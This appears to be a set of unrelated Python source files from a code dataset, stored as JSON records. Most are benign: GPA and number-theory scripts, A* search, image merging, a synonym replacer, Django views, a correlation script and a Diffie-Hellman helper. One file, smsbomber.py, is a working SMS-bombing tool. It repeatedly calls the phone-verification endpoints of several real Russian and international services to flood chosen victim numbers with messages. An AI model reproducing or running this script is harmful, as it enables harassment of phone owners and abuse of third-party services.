(\"F\"):\n course1gp=float(0.0)\n else:\n course1gp=float(0.0)\n return course1gp\n\n\n\ndef run():\n grade1 = input(\"Enter your course 1 letter grade: \")\n credit1 = input(\"Enter your course 1 credit: \")\n Gp1 = getGradePoint(grade1)\n print (f\"Grade point for course 1 is: {Gp1}\")\n\n grade2 = input(\"Enter your course 2 letter grade: \")\n credit2 = input(\"Enter your course 2 credit: \")\n Gp2 = getGradePoint(grade2)\n print 
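`getGradePoint()` in the GPA record above encodes the scale as a nine-branch `if/elif` chain (with `C+` typed as `2.330`); a dict keeps the mapping in one place and makes the unknown-grade default explicit. A minimal sketch (`GRADE_POINTS` and `get_grade_point` are illustrative names):

```python
GRADE_POINTS = {
    'A': 4.0, 'A-': 3.67, 'B+': 3.33, 'B': 3.0, 'B-': 2.67,
    'C+': 2.33, 'C': 2.0, 'D': 1.0, 'F': 0.0,
}

def get_grade_point(grade):
    # normalize case/whitespace, fall back to 0.0 like the record does
    return GRADE_POINTS.get(grade.strip().upper(), 0.0)

assert get_grade_point('b+') == 3.33
assert get_grade_point('??') == 0.0
```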
(f\"Grade point for course 2 is: {Gp2}\")\n\n grade3 = input(\"Enter your course 3 letter grade: \")\n credit3 = input(\"Enter your course 3 credit: \")\n Gp3 = getGradePoint(grade3)\n print (f\"Grade point for course 3 is: {Gp3}\")\n\n credit1=float(credit1)\n credit2=float(credit2)\n credit3=float(credit3)\n\n GPA = ((Gp1 * credit1) + (Gp2 * credit2) + (Gp3 * credit3)) / (credit1 + credit2 + credit3)\n print (f\"Your GPA is: {GPA}\")\n return GPA\nGPA=0\nif GPA == 0:\n run();","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"309760882","text":"# coding:utf-8\n\nimport sys\n\n\ndef egcd(x, y):\n if y==0:\n return x, 1, 0\n (d, a, b) = egcd(y, x%y)\n return d, b, a-(x//y)*b\n\n\ndef crt(p, m, q, n):\n a, d, r = egcd(p, q)\n if (n-m)%a!=0:\n return -1, -1\n mod = p*(q//a)\n a = (d*((n-m)//a)*p+m)%mod\n return a, mod\n\n\ndef chinese_remainder(items):\n xx = 0\n yy = 1\n for x, y in items:\n xx, yy = crt(y, x, yy, xx)\n if xx==-1:\n print(-1)\n sys.exit(0)\n if xx==0:\n xx = yy\n return xx\n\n\nn = int(input())\nx = [0]*n\nfor i in range(n):\n x[i] = tuple(map(int, input().split()))\nprint(chinese_remainder(x)%(10**9+7))\n","sub_path":"yukicoder/187.py","file_name":"187.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"489824887","text":"from queue import LifoQueue as LIFO\nimport queue\nfrom node import Node\nfrom result import Result\n\nclass TreeSearch(object):\n def __init__(self, problem):\n self.problem = problem\n self.result = Result(\"N/A\")\n\n\n def getNodeWithMinimumCost(self,frontiers):\n minimumLeaf = frontiers[0]\n for node in frontiers :\n if (node.costFromStart + node.costToGoal) <= (minimumLeaf.costFromStart + minimumLeaf.costToGoal) :\n minimumLeaf = node\n return minimumLeaf\n\n\n\n def A_Star_Search(self):\n self.frontiers = []\n self.explored = []\n self.frontiers.append(Node(self.problem.initialState , None , \"None\" , 0 , self.problem.getCostToGoal(self.problem.initialState)))\n while(True) :\n if len(self.frontiers)==0 :\n self.result.changeStatus(\"Failure\")\n return self.result\n leaf = self.getNodeWithMinimumCost(self.frontiers)\n self.frontiers.remove(leaf)\n self.explored.append(leaf.data)\n self.problem.expand(leaf.data)\n for i in range(len(self.problem.nextStates)) :\n child = Node(self.problem.nextStates[i] , leaf , self.problem.nextAction[i] , leaf.costFromStart+1 ,self.problem.getCostToGoal(self.problem.nextStates[i]) )\n if (not((child.data in self.explored)) and (child not in self.frontiers)):\n leaf.append(child)\n if (child.data in self.problem.finalStates):\n print(child.data)\n self.result.changeStatus(\"Success\")\n while(child.data != self.problem.initialState):\n self.result.addToPath(child.action)\n child = child.parent\n return self.result\n self.frontiers.append(child)\n","sub_path":"phw1/problem3/A_/TreeSearch.py","file_name":"TreeSearch.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"210397760","text":"# -*- coding:UTF-8 -*-\n\nimport os\nfrom PIL import Image\n\n\n# pictureDir = input(\"please input the direction of the picture\") 需要在实现ui时进行改动\n\n\ndef process(picture_direction1, picture_direction2, output_direction):\n with Image.open(picture_direction1).convert(\"L\") as im1:\n with 
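The `egcd`/`crt` record above leans on two identities that are easy to check numerically: `egcd(x, y)` returns `(d, a, b)` with `a*x + b*y == d == gcd(x, y)`, and two congruences `x = m (mod p)`, `x = n (mod q)` merge whenever `gcd(p, q)` divides `n - m`. A small worked sketch:

```python
def egcd(x, y):
    # returns (d, a, b) with a*x + b*y == d == gcd(x, y)
    if y == 0:
        return x, 1, 0
    d, a, b = egcd(y, x % y)
    return d, b, a - (x // y) * b

d, a, b = egcd(240, 46)
assert d == 2 and a * 240 + b * 46 == 2

# merge x = 2 (mod 3) with x = 3 (mod 5): the result is 8 (mod 15)
g, inv3, _ = egcd(3, 5)                   # inv3 * 3 == 1 (mod 5)
x = (2 + 3 * ((3 - 2) * inv3)) % 15
assert x == 8 and x % 3 == 2 and x % 5 == 3
```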
Image.open(picture_direction2).convert(\"L\") as im2:\n # 生成一张大小容纳两张照片,底色白色半透明的底图\n output_width = max(im1.size[0], im2.size[0])\n mid_width = min(im1.size[0], im2.size[0])\n output_height = max(im1.size[1], im2.size[1])\n mid_height = min(im1.size[1], im2.size[1])\n output = Image.new(\"RGBA\", (output_width, output_height),\n (255, 255, 255, 128))\n # 获取像素点颜色……\n\n for m in range(0, output_height):\n for n in range(0, output_width):\n if m <= mid_height - 1 and n <= mid_width - 1:\n if (m + n) % 2 == 0:\n colour = im1.getpixel((n, m))\n output.putpixel((n, m), (0, 0, 0, colour))\n else:\n colour = im2.getpixel((n, m))\n output.putpixel((n, m), (255, 255, 255, colour))\n elif m >= mid_height and n < mid_width:\n if im1.size[1] > im2.size[1]:\n output.putpixel((n, m), im1.getpixel((n, m)))\n else:\n output.putpixel((n, m), im2.getpixel((n, m)))\n elif m < mid_height and n >= mid_width:\n if im1.size[0] > im2.size[0]:\n output.putpixel((n, m), im1.getpixel((n, m)))\n else:\n output.putpixel((n, m), im2.getpixel((n, m)))\n # 存储\n output.save(os.path.splitext(output_direction)[0] + \".png\", \"PNG\")\n\n\ndef make_thumbs(img_direction, size=(100, 100)):\n if img_direction != \"\":\n img_object = Image.open(img_direction)\n img_object.thumbnail(size, Image.ANTIALIAS)\n return img_object\n\n\noutput_image_type_name = ('BMP', 'EPS', 'GIF', 'ICNS', 'ICO',\n 'JPEG', 'JPEG 2000', 'PCX',\n 'PNG', 'PPM', 'SGI', 'TGA', 'TIFF',\n 'WebP', 'PDF')\nimage_type = [('BMP', '.bmp'), ('EPS', '.eps'), ('CompuServe GIF' '.gif'), ('ICNS', '.icns'), ('ICO', '.ico'),\n ('JPEG', '.jpg'), ('JPEG 2000', '.j2p;.jpx;.j2k'), ('PCX', '.pcx'),\n ('PNG', '.png'), ('Portable Bit Map', '.pbm;.pgm;.ppm'), ('SGI', '.sgi'), ('Targa', '.tga'),\n ('TIFF', '.tif'), ('WebP', '.webp')]\nout_image_type = [('BMP', '.bmp'), ('EPS', '.eps'), ('CompuServe GIF' '.gif'), ('ICNS', '.icns'), ('ICO', '.ico'),\n ('JPEG', '.jpg'), ('JPEG 2000', '.j2p;.jpx;.j2k'), ('PCX', '.pcx'),\n ('PNG', '.png'), ('Portable Bit Map', '.pbm;.pgm;.ppm'), ('SGI', '.sgi'), ('Targa', '.tga'),\n ('TIFF', '.tif'), ('WebP', '.webp'), ('PDF', '.pdf')]\n","sub_path":"source_code/pic_processor/processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":3200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"434043540","text":"import nltk.data\nfrom nltk.corpus import wordnet\nfrom nltk.tokenize import word_tokenize\nfrom nltk import pos_tag\nfrom nltk.wsd import lesk\nimport random\n\n# Brief info on what you can do with wordnet in NLTK\n# http://www.nltk.org/howto/wordnet.html\n\n# this one treats the list of synonyms as a set and returns a random synonym\ndef synonym_picker(word, pos):\n synonyms = set()\n for syn in wordnet.synsets(word, pos=pos):\n for l in syn.lemmas():\n synonyms.add(l.name().replace('_', ' '))\n #print(' ', synonyms)\n if len(synonyms) > 0:\n #print(' random selection: ', random.choice(list(synonyms)))\n return random.choice(list(synonyms))\n else:\n return word\n\n# this one keeps the list of synonyms in order and returns the first one\n# seems to make more sense than the random set based option\ndef synonym_picker2(word, pos):\n synonyms = []\n for syn in wordnet.synsets(word, pos=pos):\n for l in syn.lemmas():\n if l.name() not in synonyms and l.name() != word:\n synonyms.append(l.name().replace('_', ' '))\n if len(synonyms) > 0:\n return synonyms[0]\n else:\n return word\n\n# other idea:\n# keeps the list of synonyms in order and returns the one with the highest symantic\n# 
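The `process()` routine above interleaves two grayscale images on a checkerboard one pixel at a time with `getpixel`/`putpixel`; the same merge for the overlapping region can be vectorized with numpy, which is far faster. A sketch under the record's conventions (even `row+col` parity takes black pixels with alpha from image 1, odd parity white pixels with alpha from image 2; `checkerboard_merge` is an illustrative name):

```python
import numpy as np
from PIL import Image

def checkerboard_merge(im1, im2):
    a = np.asarray(im1.convert('L'))
    b = np.asarray(im2.convert('L'))
    h = min(a.shape[0], b.shape[0])
    w = min(a.shape[1], b.shape[1])
    out = np.zeros((h, w, 4), dtype=np.uint8)
    rr, cc = np.indices((h, w))
    even = (rr + cc) % 2 == 0
    out[even, 3] = a[:h, :w][even]    # black pixels, alpha from image 1
    out[~even, 0:3] = 255             # white pixels...
    out[~even, 3] = b[:h, :w][~even]  # ...alpha from image 2
    return Image.fromarray(out, 'RGBA')
```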
similarity. For details on possible methods for calculating,\n# see\n# http://www.sersc.org/journals/IJHIT/vol6_no1_2013/1.pdf\n# http://www.nltk.org/howto/wsd.html\n# word.res_similarity(synset2, ic)\n# word.jcn_similarity(synset2, ic)\n# word.lin_similarity(synset2, ic)\n# first determine word sense using Lesk word sense disambiguation\n# then find synonyms\n#\n# PROBLEM: New word doesn't have the correct tense (if anything other then default present tense)\n# it appears that the Python 2 only library \"Pattern\" would solve this...\n# PROBLEM: This process doesn't take into account singluar vs plural nouns\n#\ndef synonym_picker3(word, wpos, sentence, npos):\n #print(word, pos, sentence)\n #print(word, \" \", npos)\n start_synset = lesk(sentence, word, wpos)\n synonyms = []\n #start_synset.res_similarity()\n if (start_synset):\n #print(start_synset.lemmas())\n for l in start_synset.lemmas():\n if l.name() not in synonyms and l.name() != word:\n synonyms.append(l.name().replace('_', ' '))\n if len(synonyms) > 0:\n return random.choice(list(synonyms))\n else:\n return word\n else:\n return word\n\n\nif __name__ == \"__main__\":\n # to get a list of all possible tags\n #print(nltk.help.upenn_tagset())\n\n sampletext = '''\nCharlene,\n\nSo you now have education content on all whiteboards (someone will first have to first do a clear all to see it). As you know, 2147 is using the whiteboard for sound, and as we discussed in the meeting, we added a USB speaker to 2146.\n\nWe have a wireless speaker option that we tested in 2143, but as we don't yet have a mounting bracket finished, did not leave the speaker. We should have that completed soon and can then figure out where a preferred mounting location would be.\n\nIf you or anyone tests out the education videos, please let us know your thoughts on the volume as well as how loud it is from the hall as well as adjacent rooms. We're particularly concerned with 2146 being loud in 2147 as the speaker for 2146 is behind the whiteboard.\n\nSeth\n'''\n\n # general logic\n # for each word, determine if it is a noun or a verb\n # find synonyms for word\n # output random synonym for word\n\n sent_detector = nltk.data.load('tokenizers/punkt/english.pickle')\n tokenized = sent_detector.tokenize(sampletext.strip())\n\n for i in tokenized:\n words = word_tokenize(i)\n tagged = pos_tag(words)\n madlib = []\n for t in tagged:\n #print(t)\n if t[1][:2] == 'VB':\n #madlib.append(synonym_picker2(t[0], wordnet.VERB))\n madlib.append(synonym_picker3(t[0], wordnet.VERB, words, t[1]))\n elif t[1][:2] == 'NN':\n #madlib.append(synonym_picker2(t[0], wordnet.NOUN))\n madlib.append(synonym_picker3(t[0], wordnet.NOUN, words, t[1]))\n elif t[1][:2] == 'JJ':\n #madlib.append(synonym_picker2(t[0], wordnet.ADJ))\n madlib.append(synonym_picker3(t[0], wordnet.ADJ, words, t[1]))\n elif t[1][:2] == 'RB':\n #madlib.append(synonym_picker2(t[0], wordnet.ADV))\n madlib.append(synonym_picker3(t[0], wordnet.ADV, words, t[1]))\n else:\n madlib.append(t[0])\n n = ''\n p = ''\n for i, m in enumerate(madlib):\n if i < len(madlib) - 1:\n n = madlib[i+1]\n if i > 0:\n p = madlib[i-1]\n #print('p: ', p)\n #print('m: ', m)\n #print('n: ', n)\n if n == ',' or n == '.' 
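`synonym_picker3` above hinges on `nltk.wsd.lesk`, which picks the candidate synset whose gloss overlaps the context sentence the most and may return `None` when nothing overlaps; the chosen synset's other lemmas then become replacement candidates. A minimal standalone sketch of that step (assumes the wordnet corpus has been downloaded):

```python
from nltk.wsd import lesk
from nltk.corpus import wordnet

sentence = 'I went to the bank to deposit money'.split()
sense = lesk(sentence, 'bank', wordnet.NOUN)
if sense is not None:
    candidates = [l.name().replace('_', ' ')
                  for l in sense.lemmas() if l.name() != 'bank']
    print(sense.definition(), candidates)
```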
or n == ')' or m == '(':\n print(m, end=\"\")\n else:\n print(m, end=\" \")\n print()\n","sub_path":"word_synonymizer.py","file_name":"word_synonymizer.py","file_ext":"py","file_size_in_byte":5035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"466987443","text":"import re\nfrom django.core.checks import messages\nfrom rest_framework import serializers\nfrom .serializers import TodoCreateSerializer,TodoShowSerializer,TodoUpdateSerializer\nfrom django.http.response import JsonResponse\nfrom django.shortcuts import render, resolve_url\nfrom rest_framework.serializers import Serializer\nfrom .models import Todo\nfrom rest_framework.views import APIView\nfrom rest_framework import status\nimport json\n\nclass CreateTodo(APIView):\n\n def post(self,request,*args,**kwargs):\n form_data = json.loads(json.dumps(request.data))\n if not(form_data.__contains__('task')):\n return JsonResponse ({\"success\":False,\"message\":\"Task field is essential\"})\n elif Todo.objects.filter(task__contains=form_data['task']).exists():\n return JsonResponse({\"success\":False,\"message\":\"Task already added\"})\n serializer = TodoCreateSerializer(data=form_data)\n if serializer.is_valid(raise_exception=True):\n serializer.save()\n data={\n \"success\":True,\n \"message\":\"Task is added in the todo list\",\n }\n return JsonResponse(data,status = status.HTTP_201_CREATED)\n else:\n data={\n \"success\":False,\n \"message\":\"Task not added due to some error in data passed\"\n }\n return JsonResponse(data,status=status.HTTP_400_BAD_REQUEST)\n\n\nclass UpdateTodo(APIView):\n\n def put(self,request,*args,**kwargs):\n form_data = json.loads(json.dumps(request.data))\n if not(form_data.__contains__('id')):\n return JsonResponse({\"success\":False,\"message\":\"Id is essential field\"})\n\n if not(form_data.__contains__('task')):\n return JsonResponse ({\"success\":False,\"message\":\"Task field is essential\"})\n\n try:\n todo = Todo.objects.get(id=form_data['id'])\n except Todo.DoesNotExist:\n return JsonResponse({\"success\":False,\"message\":\"task does not exist\"})\n \n serializer = TodoUpdateSerializer(todo,data=form_data)\n if serializer.is_valid():\n serializer.save()\n data={\n \"success\":True,\n \"message\":\"Task details updated\",\n \"data\":serializer.data\n }\n return JsonResponse(data,status=status.HTTP_200_OK)\n else:\n data={\n \"success\":False,\n \"message\":\"Task details are not updated\"\n }\n return JsonResponse(data,status=status.HTTP_400_BAD_REQUEST)\n\nclass DeleteTodo(APIView):\n def delete(self,request,*args,**kwargs):\n form_data = json.loads(json.dumps(request.data))\n if not(form_data.__contains__('id')):\n return JsonResponse({\"success\":False,\"message\":\"Id is an essential field for delete please do send it\"})\n \n try:\n todo = Todo.objects.get(id=form_data['id'])\n except Todo.DoesNotExist:\n return JsonResponse({\"success\":False,\"message\":\"The item in the list does not exist\"})\n todo.delete()\n return JsonResponse({\"success\":True,\"message\":\"The item successfully deleted\"})\n\nclass ShowTodo(APIView):\n serializer_class = TodoShowSerializer\n\n def get(self,request,*args,**kwargs):\n todos = Todo.objects.all()\n serializer = TodoShowSerializer(todos,many=True)\n return 
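The to-do views above round-trip `request.data` through `json.dumps`/`json.loads` and hand-check required fields before invoking the serializer; DRF's `request.data` is already dict-like, and `is_valid(raise_exception=True)` produces the 400 response with per-field errors on its own. A condensed sketch of the create view (reusing the record's `TodoCreateSerializer`; the class name `CreateTodoSketch` is illustrative, and the uniqueness check would live as a serializer validator):

```python
from rest_framework import status
from rest_framework.response import Response
from rest_framework.views import APIView

from .serializers import TodoCreateSerializer  # as in the record

class CreateTodoSketch(APIView):
    def post(self, request):
        serializer = TodoCreateSerializer(data=request.data)
        serializer.is_valid(raise_exception=True)  # 400 with field errors
        serializer.save()
        return Response({'success': True}, status=status.HTTP_201_CREATED)
```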
JsonResponse(serializer.data,safe=False,status=status.HTTP_200_OK)","sub_path":"todo/todoList/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"532111980","text":"# Create your views here.\nfrom django.db.models import Count, Avg\nfrom django.shortcuts import render, redirect\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom .models import Movie\nfrom .models import Rating\nfrom .models import Rater\nimport operator\n\nfrom .forms import UserForm, RaterForm, RatingForm\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\n\ndef top_movies(request):\n movies_query = Movie.objects.all()\n movies_dict = {m: m.average_rating for m in movies_query if isinstance(m.average_rating, float)}\n sorted_movies = sorted(movies_dict.items(), key=operator.itemgetter(1), reverse=True)\n top_20_movies = sorted_movies[:20]\n movies = [m[0] for m in top_20_movies]\n return render(request, \"moviebase/top_movies.html\", {'movies': movies})\n\n\ndef all_movies(request):\n movies = Movie.objects.annotate(\n rating_count=Count('rating'),\n avg_rating=Avg('rating__rating'),\n ).filter(rating_count__gte=10).order_by('-avg_rating')[:20]\n return render(request, 'moviebase/all_movies.html', {\"movies\": movies})\n\ndef show_movie(request, movie_id):\n movie = Movie.objects.get(pk=movie_id)\n ratings = movie.rating_set.all()\n user_ratings = [rating.movie for rating in request.user.rater.rating_set.all()]\n rating_dict = {rating.movie: rating for rating in request.user.rater.rating_set.all()}\n if movie in user_ratings:\n user_rating = rating_dict[movie]\n else:\n user_rating = None\n rating_form = RatingForm()\n return render(request, \"moviebase/show_movie.html\",\n {\"movie\": movie,\n \"ratings\": ratings,\n \"rating_form\": rating_form,\n \"user_rating\": user_rating\n })\n\ndef show_rater(request, rater_id):\n rater = Rater.objects.get(pk=rater_id)\n ratings = rater.rating_set.all()\n return render(request,\n \"moviebase/show_rater.html\",\n {\"rater\": rater,\n \"ratings\": ratings})\n\ndef user_register(request):\n if request.method == \"GET\":\n user_form = UserForm()\n rater_form = RaterForm()\n elif request.method == \"POST\":\n user_form = UserForm(request.POST)\n rater_form = RaterForm(request.POST)\n if user_form.is_valid() and rater_form.is_valid():\n user = user_form.save()\n profile = rater_form.save(commit=False)\n profile.user = user\n profile.save()\n\n password = user.password\n # The form doesn't know to call this special method on user.\n user.set_password(password)\n user.save()\n\n # You must call authenticate before login. :(\n user = authenticate(username=user.username,\n password=password)\n login(request, user)\n messages.add_message(\n request,\n messages.SUCCESS,\n \"Congratulations, {}, on creating your new account! 
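`top_movies` above materializes every `Movie`, builds a dict of `average_rating` properties, and sorts in Python, while `all_movies` already shows the database-side approach; a sketch of the same top-20 ranking kept entirely in the ORM (mirroring `all_movies`, minus its 10-rating floor, and reusing the record's `Movie` model):

```python
from django.db.models import Avg

from .models import Movie  # as in the record

top = (Movie.objects
       .annotate(avg_rating=Avg('rating__rating'))
       .filter(avg_rating__isnull=False)   # skip unrated movies
       .order_by('-avg_rating')[:20])
```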
You are now logged in.\".format(\n user.username))\n return redirect('all_movies')\n return render(request, \"moviebase/register.html\", {'user_form': user_form,\n 'rater_form': rater_form})\n\n@login_required\ndef user_logout(request):\n logout(request)\n return HttpResponseRedirect('/moviebase/top-movies/')\n\n\ndef make_rating(request, movie_id):\n\n if request.method == 'POST':\n rating_form = RatingForm(data=request.POST)\n\n if rating_form.is_valid():\n movie = Movie.objects.get(pk=movie_id)\n rating = rating_form.save(commit=False)\n rating.rater = request.user.rater\n rating.movie = movie\n rating.save()\n\n messages.add_message(\n request,\n messages.SUCCESS,\n \"You have registered a review of {}\".format(rating.movie)\n )\n return redirect('/moviebase/rater/{}'.format(request.user.rater.id))\n\n else:\n rating_form = RatingForm()\n\n return render(request,\n \"moviebase/rating.html\",\n {'rating_form': rating_form})","sub_path":"movieratings/moviebase/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"344337465","text":"from scipy.stats.stats import pearsonr\nimport csv\nfrom Dictionary_search import Functions\n\n\nclass CorrelationRes:\n def correlation(emo, name):\n\n price = []\n emotion = []\n with open('result\\\\' + name + '\\\\Csv_data\\\\'+name + \".csv\", 'r') as G:\n # header row indexing with DictReader\n my_csv = csv.DictReader(G, delimiter=',')\n for row in my_csv:\n # print(row['price'])\n price.append(float(row['price']))\n # print(row[emo])\n emotion.append(int(row[emo]))\n # print(price)\n # print(emotion)\n\n correlate = pearsonr(price, emotion)\n return correlate[0]\n\n def correlation_csv(name):\n emotion_list = [\"amusement\", \"interest\", \"pride\", \"joy\", \"pleasure\", \"relief\", \"compassion\",\n \"admiration\", \"contentment\", \"love\", \"disappointment\", \"regret\", \"sadness\",\n \"shame\", \"guilt\", \"hate\", \"contempt\", \"disgust\", \"fear\", \"anger\"]\n\n test_file = open('result\\\\' + name + '\\\\Csv_data\\\\'+name + \"_CT.csv\", \"w\", newline='')\n f = csv.writer(test_file)\n\n count = 0\n if count == 0:\n # Headers\n f.writerow(emotion_list)\n count += 1\n\n row=[]\n for i in emotion_list:\n row.append(CorrelationRes.correlation(i,name))\n f.writerow(row)\n print(row)\n\nCorrelationRes.correlation_csv(\"$AAPL\")","sub_path":"Flask-GitHub/WebSc/Archive/Correlation.py","file_name":"Correlation.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"415239269","text":"import requests\r\nimport re\r\nfrom requests import Session\r\nimport time\r\nimport random\r\nimport string\r\nfrom colorama import Fore, Back, Style, init\r\ninit()\r\n\r\nglobal time\r\nprint(Fore.GREEN+'SMS DESTROY PROGRAMM ACTIVATED')\r\ncount_of_phone=int(input(\"Введите кол-во номер телефона для одновременной атаки \"))\r\nallnumbers=[]\r\nfor i in range(1,count_of_phone+1):\r\n\tprint(Fore.WHITE+\"Введите \"+str(i)+\" номер телефона с кодом страны(Например +7)\")\r\n\tphone=input()\r\n\tallnumbers.append(phone)\r\ncount=int(input(\"Введите кол-во атак \"))\r\nt=int(input(\"Введите временной промежуток между атаками в сек. 
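The Correlation record above imports `pearsonr` from `scipy.stats.stats`, a long-deprecated alias for `scipy.stats`, and keeps only element `[0]` of the result; `pearsonr` returns the correlation coefficient and a two-sided p-value. A tiny sketch:

```python
from scipy.stats import pearsonr   # current import path

price = [1.0, 2.0, 3.0, 4.0]
emotion = [2, 4, 6, 8]
r, p = pearsonr(price, emotion)
assert abs(r - 1.0) < 1e-9         # perfectly linear series: r == 1
```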
\"))\r\noperation=1\r\nwhile operation==1:\r\n\tfor i in range(1,count+1):\r\n\t\tfor j in allnumbers:\r\n\t\t\trnd=random.randrange(1,5)\r\n\t\t\trnd1=random.randrange(0,2)\r\n\t\t\tif rnd>1:\r\n\t\t\t\trnd=rnd-rnd1\r\n\t\t\telse:\r\n\t\t\t\trnd=rnd+rnd1\r\n\t\t\r\n\t\t\tif rnd==1:\r\n\t\t\t\tphoneatk=requests.post('https://youla.ru/web-api/auth/request_code', data={'phone': j})\r\n\t\t\telif rnd==2:\r\n\t\t\t\tphoneatk=requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru',\r\n\t\t\t\t\t\tdata={'phone_number': j})\r\n\t\t\telif rnd==3:\r\n\t\t\t\tphoneatk=requests.post('https://www.citilink.ru/registration/confirm/phone/+' + j + '/')\r\n\t\t\telif rnd==4:\r\n\t\t\t\tj=j[1:]\r\n\t\t\t\tphoneatk=requests.post('https://rutube.ru/api/accounts/sendpass/phone', data={'phone': '+' + j})\r\n\t\t\tif j!=4:\r\n\t\t\t\tj=j[1:]\r\n\t\t\tphoneatk=requests.get('https://findclone.ru/register', params={'phone': '+' + j})\r\n\t\t\tname = ''.join(random.choice(string.ascii_letters) for k in range(6))\r\n\t\t\r\n\t\t\tphoneatk=requests.get('https://online.denga.ru/admin/api/json/registration', data={'phone': j, 'email': name + '@gmail.com','password': '12345678', 'passwordConfirmation': '12345678'})\r\n\t\t\tprint(\"[*] Произведена атака\")\r\n\t\ttime.sleep(t)\r\n\toperation=int(input(\"Операция завершена. Хотите повторить эту операцию?\\n1-да\\n0-нет \"))\r\nprint(\"В таком случае программа закрывается\")\r\n\r\n","sub_path":"smsbomber.py","file_name":"smsbomber.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"410104396","text":"import random\nfrom DH.User import User\nfrom DH.MD5 import MD5\nfrom DH.PrimeDetection import PrimeD\n\ndef find_pg():\n # 生成p,使用Miller Rabin算法进行素性检测\n print(\"#########################################################\")\n print(\"Generate a random number and check if it is prime:\")\n p = random.randint(1,999999999)\n primeDetect = PrimeD()\n while(not primeDetect.PrimeDetection(p)):\n p = random.randint(1,999999999)\n print(\"The final chosen prime number is \"+str(p))\n # 根据p计算g,g一般不会很大,选择2或5,失败则返回-1\n print(\"#########################################################\")\n print(\"Determine g from p:\")\n g = primeDetect.primitiveRoots(p)\n print(\"The final chosen g is \"+str(g))\n return p,g\n\ndef DH(p,g)->User: \n\n # 模拟Alice和Bob生成各自的密钥\n print(\"#########################################################\")\n print(\"User generate their own keys:\")\n Alice = User(random.randint(1,999),p,g)\n print(\"User's key is \"+ str(Alice.my_key))\n return Alice\n # 模拟交换密钥的过程\n # print(\"#########################################################\")\n # print(\"Step 4 Simulate the process of Bob and Alice exchanging keys:\")\n # Alice_key = str(Alice.calculateAESKey(Bob.send_to_other_key))\n # Bob_key = str(Bob.calculateAESKey(Alice.send_to_other_key))\n # print(\"Alice gets the key \"+ Alice_key)\n # print(\"Bob gets the key \"+ Bob_key)\n # # 对得到的密钥计算MD5值,得到AES需要的128bit密钥,并输出密钥值\n # print(\"#########################################################\")\n # print(\"Step 5 The final key is obtained by calculating MD5\")\n # Alice_MD5 = MD5(Alice_key,\"Alice_MD5.txt\")\n # BoB_MD5 = MD5(Bob_key,\"BoB_MD5.txt\")\n # Alice_MD5.md5Encode()\n # BoB_MD5.md5Encode()\n # print(\"#########################################################\")\n # print(\"The key exchange is complete. 
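The DH record above generates a prime `p` with Miller-Rabin and a generator `g`, then builds a single `User`; the exchange itself is just modular exponentiation, which Python's three-argument `pow` does directly. A toy-sized sketch of the full round trip (numbers far too small for real use):

```python
p, g = 23, 5
a, b = 6, 15                      # Alice's and Bob's secret exponents
A = pow(g, a, p)                  # Alice -> Bob
B = pow(g, b, p)                  # Bob -> Alice
# both sides derive the same shared secret g**(a*b) mod p
assert pow(B, a, p) == pow(A, b, p) == pow(g, a * b, p)
```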
The key is already stored in the local file\")\n","sub_path":"exp1-socket_final/DH/DH.py","file_name":"DH.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"96379520","text":"\"\"\"Core classes and functions used throughout spyke\"\"\"\n\nfrom __future__ import division\nfrom __future__ import with_statement\n\n__authors__ = ['Martin Spacek', 'Reza Lotun']\n\nimport cPickle\nimport hashlib\nimport time\nfrom datetime import timedelta\nimport os\nimport sys\nimport random\nimport string\nfrom copy import copy\nimport datetime\n\nfrom PyQt4 import QtCore, QtGui\nfrom PyQt4.QtCore import Qt\n\nimport numpy as np\nfrom numpy import pi\n\n# set some numpy options - these should hold for all modules in spyke\nnp.set_printoptions(precision=3)\nnp.set_printoptions(threshold=1000)\nnp.set_printoptions(edgeitems=5)\nnp.set_printoptions(linewidth=150)\nnp.set_printoptions(suppress=True)\n# make overflow, underflow, div by zero, and invalid all raise errors\n# this really should be the default in numpy...\nnp.seterr(all='raise')\n\nimport probes\n\nUNIXEPOCH = datetime.datetime(1970, 1, 1, 0, 0, 0) # UNIX epoch: Jan 1, 1970\n\nMU = '\\xb5' # greek mu symbol\nMICRO = 'u'\n\nDEFHIGHPASSSAMPFREQ = 50000 # default (possibly interpolated) high pass sample freq, Hz\nDEFHIGHPASSSHCORRECT = True\n# apparently KERNELSIZE == number of kernel zero crossings, but that seems to depend on\n# the phase of the kernel, some have one less. Anyway, total number of points in the\n# kernel is this plus 1 (for the middle point) - see Blanche2006\nKERNELSIZE = 12\nassert KERNELSIZE % 2 == 0 # I think kernel size needs to be even\nNCHANSPERBOARD = 32 # TODO: stop hard coding this\n\nMAXLONGLONG = 2**63-1\nMAXNBYTESTOFILE = 2**31 # max array size safe to call .tofile() on in Numpy 1.5.0 on Windows\n\nMAXNSPIKEPLOTS = 200\n\nCHANFIELDLEN = 256 # channel string field length at start of .resample file\n\nINVPI = 1 / pi\n\n\nclass EmptyClass(object):\n pass\n\n\nclass Converter(object):\n \"\"\"Simple object to store intgain and extgain values and provide 